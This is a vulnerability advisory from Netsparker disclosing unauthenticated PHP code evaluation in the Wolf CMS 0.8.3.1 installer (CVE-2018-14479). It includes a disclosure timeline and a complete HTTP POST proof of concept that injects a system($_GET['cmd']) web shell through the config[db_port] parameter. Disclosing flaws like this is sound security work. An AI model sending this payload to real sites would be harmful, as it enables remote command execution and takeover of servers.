Information
--------------------
Advisory by Netsparker
Name: PHP Code Evaluation in Wolf CMS 0.8.3.1
Affected Software: Wolf CMS
Affected Versions: 0.8.3.1
Homepage: http://www.wolfcms.org/
Vulnerability: PHP Code Evaluation
Severity: Critical
Status: Not Fixed
CVE-ID: 2018-14479
CVSS Score (3.0): CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Netsparker Advisory Reference: NS-18-014

Technical Details
--------------------

URL: http://{domain}/{wolfcms_path}/wolf/install/index.php
Parameter Name: config[db_port]
Parameter Type: POST
Attack Pattern: a');system($_GET['cmd']);echo('

Proof of Concept
--------------------

POST /wolf/install/index.php HTTP/1.1

Host: localhost:8080

install=1&config[db_driver]=mysql&config[db_host]=localhost&config[db_socket]=&config[db_user]=root&config[db_pass]=&config[db_name]=wolf&config[table_prefix]=&config[admin_username]=admin&config[url_suffix]=.html&commit=1&config[db_port]=a');system($_GET['cmd']);echo('

Video: https://www.youtube.com/watch?v=QBKOdBWk64U

Advisory Timeline
--------------------

22nd September 2017- First Contact
23rd October 2017 - Attempted to Contact 
11th December 2017 - Attempted to Contact 
16th January 2018 - Attempted to Contact 
26th October 2018 - Advisory Released

Credits & Authors
--------------------

These issues have been discovered by Omer Citak while testing Netsparker Web Application Security Scanner.

About Netsparker
--------------------

Netsparker web application security scanners find and report security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engine’s unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities. The Netsparker web application security scanner is available in two editions; Netsparker Desktop and Netsparker Cloud. Visit our website https://www.netsparker.com for more information.